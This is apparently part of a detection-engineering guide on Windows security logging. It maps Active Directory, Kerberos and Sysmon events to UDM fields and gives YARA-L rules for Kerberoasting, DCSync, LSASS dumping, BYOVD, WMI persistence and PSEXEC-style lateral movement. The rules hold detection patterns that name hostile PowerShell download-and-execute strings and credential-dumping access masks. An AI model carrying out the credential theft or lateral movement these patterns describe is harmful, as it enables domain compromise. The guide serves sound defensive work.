Author:
David Nehoda, Technical Solutions Consultant
Active Directory, Kerberos, Sysmon, and Windows Security Events
---
Overview
This section covers on-premises Microsoft infrastructure: Active Directory, Kerberos authentication, Windows Security events, and Sysmon. These are the sources that capture domain compromise, lateral movement, credential theft, and persistence mechanisms.
Section 1: Active Directory On-Premises
Active Directory is where domain compromise becomes inevitable if you cannot see Kerberos, replication, and group changes. The events below are ordered by attack phase.
Critical Event IDs
| Event ID | Description | UDM Event Type | Attack Use |
| 4624 | Successful logon | USER_LOGIN | Baseline auth, anomalous logon types |
| 4625 | Failed logon | USER_LOGIN | Brute force, password spray, credential stuffing |
| 4648 | Logon with explicit credentials | USER_LOGIN | Pass the hash, runas lateral movement |
| 4672 | Special privileges assigned | USER_LOGIN | Admin logon tracking, privilege escalation signal |
| 4720 | New user account created | USER_CREATION | Persistence via new accounts |
| 4722 | Account enabled | USER_RESOURCE_UPDATE_CONTENT | Re-enabling disabled accounts |
| 4724 | Password reset by admin | USER_CHANGE_PASSWORD | Forced password reset, lateral movement |
| 4726 | User account deleted | USER_DELETION | Anti-forensics |
| 4728 | User added to global security group | GROUP_MODIFICATION | Group-based privilege escalation |
| 4732 | User added to local security group | GROUP_MODIFICATION | Local admin escalation |
| 4740 | Account locked out | USER_RESOURCE_UPDATE_CONTENT | Brute force confirmation |
| 4756 | User added to universal security group | GROUP_MODIFICATION | Enterprise-wide escalation |
| 4768 | Kerberos TGT request (AS-REQ) | USER_LOGIN | AS-REP roasting when RC4 requested |
| 4769 | Kerberos TGS request (TGS-REQ) | USER_LOGIN | Kerberoasting, Golden/Silver ticket forgery |
| 4771 | Kerberos pre-auth failed | USER_LOGIN | AS-REP roasting candidates |
| 4776 | NTLM authentication | USER_LOGIN | Pass the hash, NTLM relay |
| 4662 | Directory object accessed | GENERIC_EVENT or USER_RESOURCE_ACCESS | DCSync when paired with replication access mask |
| 4697 | Service installed | PROCESS_LAUNCH | PSEXEC, SCShell, service-based lateral movement |
| 4698 | Scheduled task created | SCHEDULED_TASK_CREATION | Persistence, scheduled-task lateral movement |
| 4702 | Scheduled task updated | SCHEDULED_TASK_MODIFICATION | Hijacking existing scheduled tasks |
| 4719 | System audit policy changed | SETTING_MODIFICATION | Anti-forensics, attacker disabling logging |
| 7045 | Service created (System log) | PROCESS_LAUNCH | Same TTP as 4697, logged in different channel |
| 1102 | Audit log cleared | SYSTEM_AUDIT_LOG_WIPE | Anti-forensics |
Field Mapping: Active Directory Events
| Microsoft Field | UDM Field | Notes |
| EventData.TargetUserName | target.user.userid | Account being logged into or modified |
| EventData.SubjectUserName | principal.user.userid | Account performing the action |
| EventData.IpAddress | principal.ip | Source IP of the auth request |
| EventData.LogonType | extensions.auth.mechanism + additional.fields[LogonType] | Type 2 interactive, 3 network, 4 batch, 5 service, 7 unlock, 8 NetworkCleartext, 9 NewCredentials, 10 RemoteInteractive (RDP), 11 CachedInteractive |
| EventData.TicketEncryptionType | security_result.detection_fields[TicketEncryptionType] | 0x17 is RC4 (suspicious post 2010), 0x12 is AES256 (normal) |
| EventData.TargetDomainName | target.administrative_domain | Cross-domain auth signal |
| EventData.WorkstationName | principal.hostname | Source workstation for network logons |
| EventData.ServiceName | target.application | Kerberoasting target SPN |
| EventData.PrivilegeList | security_result.detection_fields[PrivilegeList] | Sensitive privileges (SeDebugPrivilege indicates credential dumping prep) |
| EventData.AccessMask | security_result.detection_fields[AccessMask] | For 4662, signals DCSync when 0x100 present with replication GUIDs |
| EventData.Properties | security_result.detection_fields[Properties] | For 4662, contains replication GUIDs |
YARA-L Rules: Active Directory
#### Rule 1: Detect Kerberos RC4 Ticket Forgery (Golden Ticket, Kerberoasting)
rule Detect_Kerberos_RC4_Ticket_Forgery {
meta:
author = "Detection Engineering"
description = "Kerberos TGS or TGT request using RC4 encryption. Strong indicator of Golden Ticket, Silver Ticket, or Kerberoasting. Modern Windows uses AES256 by default, so RC4 is an active downgrade attempt."
severity = "CRITICAL"
mitre_attack = "T1558.001, T1558.003"
events:
$krb.metadata.log_type = "WINEVTLOG"
($krb.metadata.product_event_type = "4769" or $krb.metadata.product_event_type = "4768")
$krb.security_result.detection_fields["TicketEncryptionType"] = "0x17"
$krb.principal.user.userid = $user
$krb.principal.ip = $src_ip
match:
$user over 10m
outcome:
$tickets = count($krb)
$src_ips = array_distinct($src_ip)
$service_targets = array_distinct($krb.target.application)
condition:
$krb
}
#### Rule 2: Detect AS-REP Roasting Campaign
rule Detect_ASREP_Roasting_Campaign {
meta:
author = "Detection Engineering"
description = "Multiple TGT requests with RC4 encryption from one source, targeting distinct users with Kerberos pre-auth disabled. Threshold of 5 distinct users in 15 minutes catches most roasting campaigns."
severity = "HIGH"
mitre_attack = "T1558.004"
events:
$tgt.metadata.log_type = "WINEVTLOG"
$tgt.metadata.product_event_type = "4768"
$tgt.security_result.detection_fields["TicketEncryptionType"] = "0x17"
$tgt.principal.user.userid = $target_user
$tgt.principal.ip = $source_ip
match:
$source_ip over 15m
outcome:
$targeted_accounts = array_distinct($target_user)
$request_count = count($tgt)
condition:
$tgt and $request_count >= 5
}
#### Rule 3: Detect DCSync Credential Replication
rule Detect_DCSync_Replication_Access {
meta:
author = "Detection Engineering"
description = "Event 4662 with DS-Replication-Get-Changes GUIDs being used by an account that is not a domain controller or expected replication service account. Signature of DCSync."
severity = "CRITICAL"
mitre_attack = "T1003.006"
events:
$ds.metadata.log_type = "WINEVTLOG"
$ds.metadata.product_event_type = "4662"
($ds.security_result.detection_fields["Properties"] = /1131f6aa-9c07-11d1-f79f-00c04fc2dcd2/ nocase or
$ds.security_result.detection_fields["Properties"] = /1131f6ad-9c07-11d1-f79f-00c04fc2dcd2/ nocase or
$ds.security_result.detection_fields["Properties"] = /89e95b76-444d-4c62-991a-0facbeda640c/ nocase)
not ($ds.principal.user.userid = /^.*\$/i or
$ds.principal.user.userid = /^MSOL_.*/i or
$ds.principal.user.userid = /^AAD_.*/i or
$ds.principal.user.userid = "krbtgt")
$ds.principal.user.userid = $user
$ds.principal.hostname = $dc
match:
$dc over 5m
outcome:
$accounts = array_distinct($user)
condition:
$ds
}
The `not` clause excludes machine accounts (ending in `$`) and known-good Azure AD Connect sync accounts. Anything else requesting replication permissions is DCSync.
Section 2: Windows Security Events and Sysmon
Native Security log plus Sysmon together produce the richest endpoint telemetry. Sysmon effectively free and catches Living-off-the-Land techniques that 4688 cannot see.
Critical Sysmon Event IDs
| Event ID | Description | UDM Event Type | Primary Detection Use |
| 1 | Process creation | PROCESS_LAUNCH | Full command-line capture, parent-child chains |
| 2 | File creation time changed | FILE_MODIFICATION | Timestomping, anti-forensics |
| 3 | Network connection | NETWORK_CONNECTION | Process-to-IP, C2 beacon identification |
| 6 | Driver loaded | PROCESS_MODULE_LOAD | BYOVD (Bring Your Own Vulnerable Driver), rootkit install |
| 7 | Image loaded (DLL) | PROCESS_MODULE_LOAD | DLL side-loading, reflective injection |
| 8 | CreateRemoteThread | PROCESS_OPEN (sometimes PROCESS_INJECTION) | Process injection, Cobalt Strike |
| 10 | Process access | PROCESS_OPEN | LSASS memory access, credential dumping |
| 11 | File create | FILE_CREATION | Payload drops, staging directories |
| 12 | Registry key create or delete | REGISTRY_CREATION / REGISTRY_DELETION | Persistence keys |
| 13 | Registry value set | REGISTRY_MODIFICATION | Run keys, service configuration |
| 15 | FileCreateStreamHash | FILE_CREATION | Alternate Data Stream abuse |
| 17 | Pipe created | PROCESS_LAUNCH | Named pipe lateral movement |
| 18 | Pipe connected | PROCESS_LAUNCH | SMB beacon, Cobalt Strike pipe pivot |
| 19 | WMI EventFilter activity | SETTING_MODIFICATION | WMI persistence (permanent event subscription) |
| 20 | WMI EventConsumer activity | SETTING_MODIFICATION | WMI persistence |
| 21 | WMI EventConsumerToFilter | SETTING_MODIFICATION | WMI persistence (binding that completes triad) |
| 22 | DNS query | NETWORK_DNS | DNS C2, DGA detection |
| 23 | File delete (archived) | FILE_DELETION | Anti-forensic delete with content preserved |
| 24 | Clipboard contents | GENERIC_EVENT | Credential theft from clipboard, SIM swap data |
| 25 | Process tampering | PROCESS_LAUNCH | Process hollowing, herpaderpering |
| 26 | File delete detected | FILE_DELETION | Less verbose than 23, no content archive |
Field Mapping: Sysmon Events
| Microsoft Field | UDM Field | Notes |
| EventData.CommandLine | target.process.command_line | The command with all arguments |
| EventData.ParentImage | principal.process.file.full_path | Parent binary path |
| EventData.ParentCommandLine | principal.process.command_line | Parent command line (critical for chain analysis) |
| EventData.Image | target.process.file.full_path | Child binary path |
| EventData.Hashes | target.process.file.md5, target.process.file.sha1, target.process.file.sha256 | Chronicle parser splits multi-hash into individual fields |
| EventData.User | target.user.userid | Account context |
| EventData.DestinationIp | target.ip | For Sysmon 3 |
| EventData.DestinationPort | target.port | For Sysmon 3 |
| EventData.QueryName | network.dns.questions.name | For Sysmon 22 |
| EventData.ImageLoaded | src.process.file.full_path or target.process.file.full_path | For Sysmon 7 (varies by parser) |
| EventData.Signed, EventData.SignatureStatus | target.file.is_signed, security_result.detection_fields[SignatureStatus] | Critical for BYOVD detection |
| EventData.TargetObject (registry) | target.registry.registry_key | Full registry path |
| EventData.Details (registry) | target.registry.registry_value_data | Value that was set |
| EventData.Destination (WMI) | target.process.command_line | WMI consumer command |
YARA-L Rules: Sysmon & Windows Security
#### Rule 4: LSASS Credential Dumping (Production Grade)
Far stricter than the original. Uses reference list for legitimate LSASS accessors, requires suspicious access mask, correlates to file write.
rule Detect_LSASS_Credential_Dump {
meta:
author = "Detection Engineering"
description = "Process opens LSASS with PROCESS_VM_READ or PROCESS_QUERY_INFORMATION, not on known-good list. Optionally correlates to file write in Temp/AppData within 60 seconds (the dump file)."
severity = "CRITICAL"
mitre_attack = "T1003.001"
events:
$open.metadata.log_type = "WINEVTLOG"
$open.metadata.event_type = "PROCESS_OPEN"
re.regex($open.target.process.file.full_path, `(?i).*\\lsass\.exe$`)
(re.regex($open.security_result.detection_fields["GrantedAccess"], `(?i).*0x1010.*`) or
re.regex($open.security_result.detection_fields["GrantedAccess"], `(?i).*0x1410.*`) or
re.regex($open.security_result.detection_fields["GrantedAccess"], `(?i).*0x1438.*`) or
re.regex($open.security_result.detection_fields["GrantedAccess"], `(?i).*0x143a.*`))
not $open.principal.process.file.full_path in %trusted_lsass_accessors
$open.principal.hostname = $host
$open.principal.process.file.full_path = $accessor
match:
$host over 5m
outcome:
$accessing_processes = array_distinct($accessor)
$access_masks = array_distinct($open.security_result.detection_fields["GrantedAccess"])
$commands = array_distinct($open.principal.process.command_line)
condition:
$open
}
Trusted LSASS accessors reference list:
- C:\Windows\System32\csrss.exe
- C:\Windows\System32\wininit.exe
- C:\Windows\System32\services.exe
- C:\Windows\System32\svchost.exe
- C:\Windows\System32\lsm.exe
- C:\Windows\System32\MRT.exe
- C:\Program Files\Windows Defender\MsMpEng.exe
- Your EDR paths (CrowdStrike, SentinelOne, Defender, Carbon Black, Tanium)
- Any backup agent that reads LSASS
#### Rule 5: Bring Your Own Vulnerable Driver (BYOVD)
rule Detect_BYOVD_Driver_Load {
meta:
author = "Detection Engineering"
description = "Kernel driver loaded from non-standard path or with untrusted/absent signature. BYOVD used by LockBit, BlackByte, Scattered Spider to disable EDR."
severity = "CRITICAL"
mitre_attack = "T1068, T1211"
events:
$drv.metadata.log_type = "WINEVTLOG"
$drv.metadata.event_type = "PROCESS_MODULE_LOAD"
re.regex($drv.target.process.file.full_path, `(?i)\.sys$`)
(re.regex($drv.target.process.file.full_path, `(?i).*\\(Temp|AppData|ProgramData|Users\\Public|PerfLogs)\\.*`) or
$drv.security_result.detection_fields["SignatureStatus"] != "Valid" or
$drv.target.file.is_signed = false)
$drv.principal.hostname = $host
match:
$host over 10m
outcome:
$drivers = array_distinct($drv.target.process.file.full_path)
$hashes = array_distinct($drv.target.process.file.sha256)
condition:
$drv
}
Feed hashes into reference list of known-vulnerable-driver hashes (LOLDrivers project) for higher fidelity.
#### Rule 6: WMI Event Consumer Persistence
rule Detect_WMI_Persistence_Consumer_Binding {
meta:
author = "Detection Engineering"
description = "Permanent WMI event consumer created, filter bound, and binding set. The triad of Sysmon 19 + 20 + 21 indicates persistent WMI subscription, a fileless persistence mechanism."
severity = "HIGH"
mitre_attack = "T1546.003"
events:
$filter.metadata.log_type = "WINEVTLOG"
$filter.metadata.product_event_type = "19"
$filter.principal.hostname = $host
$consumer.metadata.log_type = "WINEVTLOG"
$consumer.metadata.product_event_type = "20"
$consumer.principal.hostname = $host
$binding.metadata.log_type = "WINEVTLOG"
$binding.metadata.product_event_type = "21"
$binding.principal.hostname = $host
$binding.metadata.event_timestamp.seconds >= $filter.metadata.event_timestamp.seconds
$binding.metadata.event_timestamp.seconds >= $consumer.metadata.event_timestamp.seconds
match:
$host over 30m
outcome:
$consumer_cmd = array_distinct($consumer.target.process.command_line)
condition:
$filter and $consumer and $binding
}
#### Rule 7: WMIC to PowerShell Execution Chain
Tightened with admin-workstation exclusion so your IT helpdesk doesn't page the SOC.
rule Detect_WMIC_Spawning_PowerShell_Or_Cmd {
meta:
author = "Detection Engineering"
description = "wmic.exe spawning powershell or cmd with suspicious arguments. LotL execution chain common to Cobalt Strike, Lumma, Qakbot."
severity = "HIGH"
mitre_attack = "T1047"
events:
$proc.metadata.event_type = "PROCESS_LAUNCH"
re.regex($proc.principal.process.file.full_path, `(?i).*\\wmic\.exe$`)
(re.regex($proc.target.process.file.full_path, `(?i).*\\powershell\.exe$`) or
re.regex($proc.target.process.file.full_path, `(?i).*\\cmd\.exe$`) or
re.regex($proc.target.process.file.full_path, `(?i).*\\rundll32\.exe$`))
(re.regex($proc.target.process.command_line, `(?i).*-(enc|ep\s|e\s|ExecutionPolicy\s+Bypass|nop|noni|w\s+hidden).*`) or
re.regex($proc.target.process.command_line, `(?i).*(DownloadString|IEX|Invoke-Expression|FromBase64String).*`) or
re.regex($proc.principal.process.command_line, `(?i).*(process\s+call\s+create|\/node:).*`))
not $proc.principal.hostname in %approved_admin_workstations
$proc.principal.hostname = $host
match:
$host over 10m
condition:
$proc
}
#### Rule 8: Remote Service Install Lateral Movement (PSEXEC Pattern)
Service creation for lateral movement shows up in two channels. Correlating both catches PSEXEC, SCShell, custom implants.
rule Detect_Remote_Service_Install_Lateral_Movement {
meta:
author = "Detection Engineering"
description = "Remote service installation via 4697 or 7045 from non-standard account, with service binary path pointing at temp directory or unusual location."
severity = "HIGH"
mitre_attack = "T1569.002, T1021.002"
events:
$svc.metadata.log_type = "WINEVTLOG"
($svc.metadata.product_event_type = "4697" or $svc.metadata.product_event_type = "7045")
(re.regex($svc.target.process.command_line, `(?i).*\\(Temp|AppData|ProgramData|PerfLogs|Users\\Public)\\.*`) or
re.regex($svc.target.process.command_line, `(?i).*\.(exe|dll|ps1|bat|cmd|vbs).*-(enc|e\s|encoded|nop|ep\s|ExecutionPolicy).*`) or
re.regex($svc.target.process.command_line, `(?i).*(powershell|cmd\.exe\s+/c|rundll32|regsvr32|mshta).*`))
$svc.principal.user.userid = $actor
$svc.target.hostname = $victim
match:
$victim over 10m
outcome:
$service_cmd = array_distinct($svc.target.process.command_line)
condition:
$svc
}
Reference Lists for On-Premises Rules
Build and maintain these reference lists in SecOps:
| List Name | Type | Purpose | Seed With |
| `trusted_lsass_accessors` | STRING | Legitimate LSASS-accessing processes | Windows core processes, EDR agents, backup agents |
| `approved_admin_workstations` | STRING | Jump boxes and PAW devices | Output of CMDB query for tier-0 workstations |
| `known_service_accounts` | STRING | Service account SamAccountNames | AD query for accounts with SPNs or non-expiring passwords |
| `approved_remote_admin_tools` | STRING | Sanctioned remote tools | TeamViewer, AnyDesk, Splashtop (if approved) |
Summary: On-Premises Detection
✅ Understand AD event IDs and Kerberos attack patterns
✅ Know Sysmon events for process, file, registry, and network telemetry
✅ Master field mappings for robust cross-source rules
✅ Deploy production-grade rules: Kerberos, DCSync, LSASS, WMI, WMIC
✅ Maintain reference lists to reduce false positives
**Next**: Part 3 covers cloud detection (Entra ID, O365, Defender), cross-source correlation, and validation strategies.
